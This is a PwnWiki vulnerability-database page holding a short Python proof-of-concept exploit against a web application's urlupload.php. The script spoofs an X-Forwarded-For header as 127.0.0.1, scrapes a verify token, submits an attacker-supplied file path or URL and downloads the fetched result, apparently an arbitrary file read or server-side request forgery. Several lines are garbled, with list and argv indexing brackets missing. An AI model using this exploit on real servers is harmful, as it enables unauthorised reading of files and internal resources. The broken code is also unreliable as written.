免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
POC
import requests
import re
import sys
url = sys.argv1
file = sys.argv2
headers={"X-Forwarded-For":"127.0.0.1"}
requests = requests.session()
html = requests.get(url+"/urlupload.php").text
verify = re.findall("name=\"verify\" value=\"(.*?)\"",html)0
data={"url":file,"name":"1231421312.torrent","pwd":"Aa1345123","verify":verify}
html = requests.post(url+"urlupload.php?a=1",data=data,headers=headers).text
try:
down_url = re.findall("<a href=\"(down.php.*?)\"",html)0
result = requests.get(url+down_url).text
except:
result = "error"
print(result)
pwnwiki.com
